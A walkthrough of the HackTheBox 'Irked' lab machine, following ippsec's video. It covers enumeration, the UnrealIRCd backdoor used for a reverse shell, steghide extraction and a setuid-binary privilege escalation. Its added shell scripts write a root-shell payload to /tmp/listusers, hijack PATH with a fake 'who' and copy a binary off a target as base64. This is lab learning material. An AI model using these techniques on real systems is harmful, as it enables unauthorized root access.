Dissection of ippsec’s YouTube video HackTheBox - Irked (Fixed). The box covers enumeration of an UnrealIRCd server (and its backdoor), steganography with steghide, and a SUID binary that leads to root escalation.
Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risks/responsibilities.
This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting technique and solidify the understanding and methodologies used during penetration testing.
YouTube Link: https://www.youtube.com/watch?v=OGFTM_qvtVI
Enumeration
Nmap scan
Web server
Check out the web server on port 80. The page only says something about IRC, so start a full port scan of the box in the background while continuing with the web server.
full nmap scan
Return to the web server
check robots.txt: doesn’t exist
check /~root: some old Apache installs expose user home directories this way (mod_userdir), but it is rarely seen now
run gobuster
Return to the web server
check /index.html: we get the same main page, which establishes that the site is static HTML
try index.aspx and Default.aspx: nothing, so it is not an ASP.NET site
return to gobuster: discovered /manual
check out /manual: the default Apache documentation page. Its copyright is 2014, which could mean the Apache install is old.
Nmap full port scan
The full scan returned an additional open port, 8067. Enumerate what is listening on it with nmap.
The port is open and running UnrealIRCd.
Connect to port 8067 with ncat.
Since the server greets us by hostname, edit the hosts file on the local box so that name points at the target.
Check that the hostname works in Firefox, and whether the web server routes it differently (virtual hosts).
IRCd banner information grab
Google “RFC IRC” for the client registration commands, then connect with ncat and send them so the server announces its version.
Search the UnrealIRCd changelog for that version name; it turns up multiple vulnerabilities.
searchsploit UnrealIRCd
A Metasploit module, UnrealIRCd backdoor command execution, is identified.
Google “unrealircd backdoor” leads to https://lwn.net/Articles/392201/, which describes exactly how the exploit works.
In a nutshell: a backdoor was planted in the 3.2.8.1 source, disguised to look like debug code; any input line that begins with “AB” is handed straight to system().
Moving forward without Metasploit, now that we know how the exploit functions.
Set up tcpdump on the attacking box to watch for ICMP.
Send a ping command to UnrealIRCd through the backdoor.
After the IRC connection timed out, the ping (ICMP) arrived and was captured by tcpdump, so the command was executed.
Command Execution
Having confirmed that a ping can be run through the “AB” backdoor, move on to a reverse shell.
Set up a listener and send the reverse shell.
Reverse shell via IRC.
Wait for the timeout… which didn’t result in a shell.
Retry, wrapping the command in bash -c '…', in case the target’s /bin/sh is dash (or another minimal shell) that does not understand the bash syntax in the reverse shell.
Connection established: reverse shell.
Upgrade the shell.
Enumerate box
print working directory
search the directory
check .bash_history: it records a cd into the djmardov directory
navigate to the djmardov directory
check when the kernel was compiled: uname -a
check for hidden files: find . -ls
quite a few permission denied; narrow to regular files: find . -type f -ls (the -type test has to come before -ls, or everything is printed)
still more permission denied.
discovered user.txt
check Documents: we cannot read user.txt because we are not djmardov
there is a .backup file, and it gives us a backup password for some steganography.
There has only been one image on this box the entire time, so download it locally.
use steghide; if not installed, install it with the package manager.
The most common use on CTFs is steghide extract with the password.
It extracted a file containing a password string.
Priv-Esc
SSH in as djmardov with the recovered password.
Check the files in the home directory, looking for anything obvious.
Return to user.txt and read it.
Enumeration with LinEnum
Host LinEnum on a local web server on the attacking box, then fetch and execute it on the target.
The SUID files that stick out were last modified in 2018:
exim4 = mail server; viewuser = interesting prospect
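The manual check behind the LinEnum finding above, as an added example (not from the page or from LinEnum): list setuid files with mode, owner and modification date so the odd ones stand out, and filter them by date. GNU find (-printf, -newermt) is assumed.

```shell
#!/bin/sh
# Added example (not code from the page or from LinEnum): the manual check
# behind "SUID files that stick out": every setuid file under a directory,
# with date, mode and owner, sorted oldest-first. GNU find is assumed.

# "YYYY-mm-dd  mode  owner  path" for each setuid file under $1 (default /).
list_suid() {
    root="${1:-/}"
    find "$root" -type f -perm -4000 -printf '%TY-%Tm-%Td  %M  %u  %p\n' 2>/dev/null | sort
}

# Only setuid-ROOT binaries matter for root escalation.
list_suid_root() {
    list_suid "${1:-/}" | awk '$3 == "root"'
}

# Setuid files modified on or after a date (e.g. 2018-01-01). An unusually
# recent setuid binary on an otherwise old install, like viewuser here, is
# worth a closer look.
suid_modified_since() {
    since="$1"; root="${2:-/}"
    find "$root" -type f -perm -4000 -newermt "$since" -printf '%TY-%Tm-%Td  %p\n' 2>/dev/null | sort
}

# Usage on a target (no directory argument scans the whole filesystem):
#   list_suid_root
#   suid_modified_since 2018-01-01
```

The date column is what makes viewuser visible at a glance: distribution setuid binaries share the install date, while a hand-built one carries its own.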
viewuser binary
Check the SUID bit on /usr/bin/viewuser.
Indeed this binary is setuid root, so whatever it runs, runs as root.
Test the functionality of viewuser.
Copy the binary off the remote box via base64 (copy the output to the clipboard).
Decode the base64 locally.
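The base64 transfer above with the integrity check a practitioner should add, as an added example (not from the page): a wrapped or truncated paste corrupts the binary silently, so pack the file with its hash and refuse a copy that does not match. GNU coreutils (base64 -w0, sha256sum) are assumed on both ends.

```shell
#!/bin/sh
# Added example (not code from the page): move a binary off a target over a
# plain shell with base64, verifying the copy by hash. GNU coreutils assumed.

# On the target: print the sha256 of the file, then the file as a single
# unwrapped base64 line (-w0), so both can be copied together.
b64_pack() {
    f="$1"
    sha256sum "$f" | awk '{print $1}'
    base64 -w0 "$f"
    echo
}

# Locally: read the two pasted lines from stdin, decode to $1 and verify the
# hash. On any mismatch or decode error the partial file is removed and the
# function returns 1, so a bad paste is never analysed by accident.
b64_unpack() {
    out="$1"
    read -r want
    read -r data
    printf '%s' "$data" | base64 -d > "$out" || { rm -f "$out"; return 1; }
    got=$(sha256sum "$out" | awk '{print $1}')
    if [ "$got" != "$want" ]; then
        echo "hash mismatch: want $want got $got" >&2
        rm -f "$out"
        return 1
    fi
    chmod +x "$out"
}

# Usage: on the target run `b64_pack /usr/bin/viewuser` and copy both lines;
# locally run `b64_unpack ./viewuser` and paste them (or pipe a saved file in).
```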
It could have been opened in Ghidra or IDA Pro; opting to use strace and ltrace instead.
strace = lists all system calls (the output is difficult to read)
ltrace = lists library calls, which is what we want here: the setuid() and system() calls show up directly
The system() call runs “who” with no full path, which could let us substitute our own who via PATH. Afterwards the binary calls setuid(0) and executes /tmp/listusers, a path any user can write to.
Modify /tmp/listusers (on the target box)
Create /tmp/listusers containing a script that launches a shell.
Make it executable with chmod.
Return to viewuser, which in turn executes this file and should launch a bash shell as root.
Secondary exploit of the “who” call
What should be executed is /usr/bin/who.
Locate who.
Change PATH so that a directory we control comes first.
Now we can create our own who there.
Make it executable with chmod.
This did not priv-esc: the “who” call, and therefore the /bin/bash our fake who launches, happens before the setuid(0) in the function. At that point only the effective UID is root while the real UID is still djmardov, and bash drops an effective UID that differs from the real one, so this path is not exploitable the way /tmp/listusers (which runs after setuid(0)) is.
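Both halves of the viewuser analysis as an added example (not from the page): writing the /tmp/listusers payload, and a local demonstration of how an unqualified system("who") resolves through PATH. The privilege-drop behaviour is only described in comments, since it cannot be reproduced without the setuid binary; the fake-who output format is my own.

```shell
#!/bin/sh
# Added example (not code from the page): the two mechanisms behind the
# viewuser privilege escalation, runnable locally without the setuid binary.
# (1) write_listusers creates the payload that viewuser's
#     system("/tmp/listusers") runs as root after setuid(0).
# (2) hijacked_who shows why an unqualified system("who") is hijackable:
#     /bin/sh resolves "who" through PATH, so a fake who in a directory we
#     prepend to PATH wins over /usr/bin/who.

# Write a shell-spawning payload to $1 (normally /tmp/listusers) and make it
# executable. viewuser calls setuid(0) before running it, so real and
# effective UID are both 0 and bash keeps root.
write_listusers() {
    target="$1"
    printf '#!/bin/bash\n/bin/bash\n' > "$target"
    chmod +x "$target"
}

# Run the unqualified command "who" the way system() does (via sh -c), with a
# directory of our choosing prepended to PATH. Returns that command's output,
# which here comes from our fake who, not /usr/bin/who.
hijacked_who() {
    dir="$1"
    printf '#!/bin/sh\necho HIJACKED uid=$(id -u)\n' > "$dir/who"
    chmod +x "$dir/who"
    PATH="$dir:$PATH" sh -c 'who'
}

# Why the fake-who route did not give root in the video (comment only; it
# needs the real setuid binary to reproduce): viewuser's system("who") runs
# BEFORE setuid(0), so a bash started there has euid 0 but ruid djmardov, and
# bash resets euid to ruid when they differ. /tmp/listusers runs after
# setuid(0), when both are 0, which is why that route works.
```

The hardening follow-up for the developer is the mirror image: never call system() on a fixed path under a world-writable directory, and use absolute paths (or a sanitised PATH) for anything a setuid program executes.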
Loot&Root
Don’t know who ippsec is? Check him out at:
Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec
#hailippsec